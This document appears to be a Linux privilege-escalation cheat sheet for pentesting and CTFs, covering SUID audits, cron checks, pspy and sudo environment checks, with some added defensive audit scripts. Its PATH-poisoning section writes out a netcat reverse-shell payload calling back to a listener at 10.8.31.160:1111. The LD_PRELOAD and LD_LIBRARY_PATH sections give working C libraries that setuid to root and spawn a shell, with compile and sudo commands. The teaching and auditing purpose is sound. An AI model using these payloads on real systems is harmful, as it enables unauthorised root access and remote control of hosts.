Privilege Escalation¶
Looking into Files¶
Searching the file system for the files that matter (configuration, scripts, credentials, binaries with special permission bits) is the first step in finding a way to escalate privileges.
tree¶
tree lists a directory and everything below it recursively.
tree [dir]
find¶
On some systems tree is not installed. The following find one-liner gives a tree-like overview by printing, for each immediate subdirectory, how many regular files it contains:
find [directory] -maxdepth 1 -type d -exec sh -c 'echo -n "$(basename "{}"): "; find "{}" -type f 2>/dev/null | wc -l' \;
For the current directory:
find . -maxdepth 1 -type d -exec sh -c 'echo -n "$(basename "{}"): "; find "{}" -type f 2>/dev/null | wc -l' \;
SUID or SGID¶
Files with the setuid (SUID) or setgid (SGID) bit run with the privileges of their owner or group rather than those of the user who executes them. A root-owned SUID binary that calls other programs by relative name, reads attacker-controlled files, or contains a memory-corruption bug therefore hands root to whoever can trigger the flaw, which is why these files are a security concern.
Regularly audit SUID and SGID files, understand why each one needs the bit, and remove it from (or remove) those that do not. The find commands below are the usual starting point: -perm -4000 matches the setuid bit and -perm -2000 the setgid bit (-perm -u=s and -perm -g=s are equivalent spellings). Searching only /bin, as in the first command, misses binaries in /usr/bin, /usr/sbin and elsewhere, so prefer the search from /.
find /bin -perm -4000
Or search the whole file system, discarding errors for directories you cannot read:
find / -perm -u=s -type f 2>/dev/null
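Raw output of those find commands is long on a real system; what you actually want is the entries that do not belong there. The following script is an added example (not from the original page) that lists setuid and setgid files under a directory and filters out a small allowlist of binaries that are normally setuid on Debian-style systems. The allowlist, the -xdev choice and the "run" argument are illustrative assumptions.

```shell
#!/bin/sh
# Added example (not from the original page): enumerate setuid/setgid files
# under a directory and report the ones that are not on a known-good list.

# Basenames that are normally setuid/setgid on a Debian-style system.
# This allowlist is an assumption for illustration; adjust it to your distro.
KNOWN_SPECIAL="passwd su sudo mount umount chsh chfn gpasswd newgrp ping pkexec"

# Print every regular file under $1 with the setuid (4000) or setgid (2000)
# bit set, as "octal-mode owner:group path". -xdev keeps find on one
# filesystem (skips /proc and network mounts; rerun per mount point if /usr
# is separate). Unreadable directories are silenced.
list_special_bits() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u:%g %p\n' 2>/dev/null | sort -k3
}

# Filter list_special_bits to entries whose basename is not in KNOWN_SPECIAL.
# Anything printed here deserves a look: custom binaries, copies of a shell,
# or a distro binary sitting somewhere unusual.
unexpected_special_bits() {
    list_special_bits "$1" | while read -r mode owner path; do
        name=$(basename "$path")
        case " $KNOWN_SPECIAL " in
            *" $name "*) ;;                                   # expected, skip
            *) printf '%s %s %s\n' "$mode" "$owner" "$path" ;;
        esac
    done
}

# Usage: sh suid_audit.sh run [start-dir]   (defaults to /)
if [ "${1:-}" = "run" ]; then
    unexpected_special_bits "${2:-/}"
fi
```

The mode column makes the distinction visible at a glance: 4755 is setuid, 2755 is setgid, 6755 both. A file that is on the allowlist by name but lives outside /bin, /usr/bin or /usr/sbin is still worth checking by hand, because a copy of su or passwd in /tmp passes the name filter.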
ltrace¶
To see which library calls a binary makes while it runs, for example a system() or execvp() call that names a command without an absolute path, use ltrace. Note that the kernel does not honour the setuid bit for a process traced by an unprivileged user, so under ltrace the binary runs with your own privileges; the calls it makes are still visible, which is what matters for finding a hijack point.
ltrace /usr/sbin/checker
Path Poisoning¶
Prepend a directory you can write to (here /tmp) to PATH, so that it is searched first:
PATH=/tmp:$PATH
Create an executable named after the command the SUID binary calls without an absolute path (here date) and make it spawn a reverse shell to the listener at 10.8.31.160:1111. The execute bit is required, otherwise the shell skips the file when resolving date:
echo "#!/bin/sh" > date
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.31.160 1111 >/tmp/f" >> date
chmod +x date
Start a listener on port 1111 on the attacking host, then run the SUID binary. The first date it finds is the one in /tmp, and the shell connects back with the binary's effective UID. This only works when the binary looks the command up through PATH; a hardcoded /bin/date cannot be hijacked this way, and if the system shell is bash rather than dash the spawned shell needs -p to keep the elevated effective UID.
./suid_binary
Cron Jobs¶
Cron jobs are scheduled tasks that run at specific times or intervals. They are used to automate repetitive work such as backups, system maintenance, or data processing. They are defined in crontab files: the system crontab /etc/crontab and the files in /etc/cron.d/ carry a user field and usually run as root, while per-user crontabs under /var/spool/cron/ (or /var/spool/cron/crontabs/) run as their owner.
Cron jobs become a privilege-escalation vector when a job running as root executes a script or binary you can modify, or calls a command by relative name while the crontab's PATH line (default /usr/bin:/bin) contains a directory you can write to. Start by reading /etc/crontab and /etc/cron.d/*, then check the ownership and permissions of every path they reference.
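The check described above can be scripted. The following is an added example (not from the original page) that parses a system-format crontab, extracts the user and command of every job, and reports each absolute path in a command line that the current user can write to. The sample crontab in the usage is constructed; the "run" argument and file names are illustrative.

```shell
#!/bin/sh
# Added example (not from the original page): parse a system-format crontab
# (m h dom mon dow user command) and report jobs that execute a file the
# current user can modify.

# Print "user command" for every job in crontab file $1. Comments, blank
# lines and VAR=value assignments are skipped; @reboot/@daily shortcuts
# (which have only three fields before the command) are handled too.
cron_jobs() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/           { next }   # comment or blank line
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/  { next }   # SHELL=, PATH=, MAILTO=
        /^[ \t]*@/ && NF >= 3 {
            user = $2; $1 = ""; $2 = ""
            sub(/^[ \t]+/, ""); print user " " $0; next
        }
        NF >= 7 {
            user = $6; for (i = 1; i <= 6; i++) $i = ""
            sub(/^[ \t]+/, ""); print user " " $0
        }
    ' "$1"
}

# For each job, check every absolute path on its command line. A writable
# target means the job owner (usually root) runs our changes at the next
# scheduled run. Relative command names are resolved through the crontab
# PATH line, which is a separate check (see writable PATH entries).
cron_writable_targets() {
    set -f                                    # no globbing of * in commands
    cron_jobs "$1" | while read -r user cmd; do
        for tok in $cmd; do
            case $tok in
                /*) if [ -f "$tok" ] && [ -w "$tok" ]; then
                        printf '%s runs %s, writable by %s\n' "$user" "$tok" "$(id -un)"
                    fi ;;
            esac
        done
    done
    set +f
}

# Usage: sh cron_audit.sh run
if [ "${1:-}" = "run" ]; then
    for f in /etc/crontab /etc/cron.d/*; do
        [ -f "$f" ] && cron_writable_targets "$f"
    done
fi
```

A writable script is the easy case. If the job runs something like run-parts over a directory, check the directory's permissions as well, since dropping a new file there is enough. For jobs that are not visible in any crontab (for example systemd timers or a crontab of another user you cannot read), pspy below shows them as they fire.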
pspy - unprivileged Linux process snooping¶
pspy is a command line tool designed to snoop on processes without needing root permissions. It lets you see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs, and also a good way to show colleagues why passing secrets as command-line arguments is a bad idea.
The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
Some examples:
# print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000
# place watchers recursively in two directories and non-recursively into a third
./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir
# disable printing discovered commands but enable file system events
./pspy64 -p=false -f
PE with LD_PRELOAD¶
LD_PRELOAD is an environment variable holding a list of additional ELF shared libraries that the dynamic loader maps into a process before all others. Code in such a library can override functions from other libraries or, through a constructor, run arbitrary code before main starts. The loader ignores LD_PRELOAD for setuid and setgid executables (apart from libraries in the trusted system directories), so it cannot be injected into a SUID binary directly. It does work through sudo when the sudoers configuration keeps the variable across env_reset (env_keep += LD_PRELOAD); sudo -l shows whether that is the case.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   // setgid(), setuid()

// Runs when the library is mapped. Building with -nostartfiles lets us
// provide _init ourselves instead of the one from the C runtime.
void _init() {
    unsetenv("LD_PRELOAD"); // otherwise the shell we spawn would load this library again
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
Compile it as a shared library and run a sudo-allowed command (here find) with LD_PRELOAD pointing at it; the constructor runs as root before find does:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/home/saad/shell.so find
whoami
root
PE with LD_LIBRARY_PATH¶
LD_LIBRARY_PATH is a colon-separated list of directories the dynamic loader searches for shared libraries before the default locations. As with LD_PRELOAD, it is ignored for setuid executables and normally reset by sudo, so this vector needs env_keep += LD_LIBRARY_PATH (or a SETENV tag on the command) in sudoers.
Use ldd to list the shared libraries the target loads and pick one to replace:
$ ldd /usr/sbin/apache2
[...]
libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007f4de794b000)
[...]
Create a shared library with the same file name, with a constructor that runs as soon as it is loaded:
// evil.c
#define _GNU_SOURCE   // setresuid() is a GNU extension
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Constructor attribute: run hijack() when the loader maps this library,
// before the program's main.
static void hijack() __attribute__((constructor));
void hijack() {
    unsetenv("LD_LIBRARY_PATH"); // do not hijack the shell we are about to spawn
    setresuid(0,0,0);
    system("/bin/bash -p");      // -p keeps the effective UID instead of dropping it
}
Compile it into the directory you will put in LD_LIBRARY_PATH and run the sudo-allowed command; the loader picks /tmp/libcrypt.so.1 instead of the real library and the constructor runs as root:
gcc -o /tmp/libcrypt.so.1 -shared -fPIC evil.c
sudo LD_LIBRARY_PATH=/tmp /usr/sbin/apache2 -f /etc/apache2/apache2.conf -d /etc/apache2
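Both the LD_PRELOAD and the LD_LIBRARY_PATH technique stand or fall on whether sudo passes the variable through, so the first thing to do is read sudo -l for env_keep entries and SETENV tags. The script below is an added example (not from the original page) that does that parsing; the sudo -l text it is exercised with is constructed, not captured from a real host, and the "run" argument is illustrative. It assumes the English output format of sudo -l.

```shell
#!/bin/sh
# Added example (not from the original page): decide from `sudo -l` output
# whether LD_PRELOAD or LD_LIBRARY_PATH will reach a sudo-run command.
# sudo's env_reset strips both unless sudoers lists them in env_keep, or the
# command carries the SETENV tag (then any variable can be passed).

# Read `sudo -l` output on stdin; print the LD_* variables named in env_keep
# entries, one per line. Handles env_keep+=VAR and env_keep+="VAR1 VAR2";
# env_keep-= removals are skipped rather than interpreted.
sudo_kept_loader_vars() {
    tr ',' '\n' | grep 'env_keep' | grep -v 'env_keep-=' \
        | tr -d '"' | grep -o 'LD_[A-Z_]*' | sort -u
}

# Read `sudo -l` output on stdin; print the commands tagged SETENV.
sudo_setenv_commands() {
    grep -o 'SETENV:[^,]*' | sed 's/^SETENV:[ \t]*//'
}

# Summarise the attack surface for the two vectors on this page.
sudo_ld_vector_report() {
    text=$(cat)
    kept=$(printf '%s\n' "$text" | sudo_kept_loader_vars)
    setenv=$(printf '%s\n' "$text" | sudo_setenv_commands)
    if [ -n "$kept" ]; then
        printf 'env_keep passes: %s\n' "$(printf '%s' "$kept" | tr '\n' ' ')"
    fi
    if [ -n "$setenv" ]; then
        printf 'SETENV allows any variable for: %s\n' "$setenv"
    fi
    [ -n "$kept$setenv" ] || echo "no LD_* vector via sudo"
}

# Usage: sh sudo_ld_check.sh run   (-n: never prompt for a password)
if [ "${1:-}" = "run" ]; then
    sudo -n -l 2>/dev/null | sudo_ld_vector_report
fi
```

If the report is empty, neither of the two techniques above applies through sudo on that host, and the time is better spent on SUID binaries, cron, or the PATH checks earlier on this page. If SETENV is present, you do not even need env_keep: sudo VAR=value command is accepted for that command.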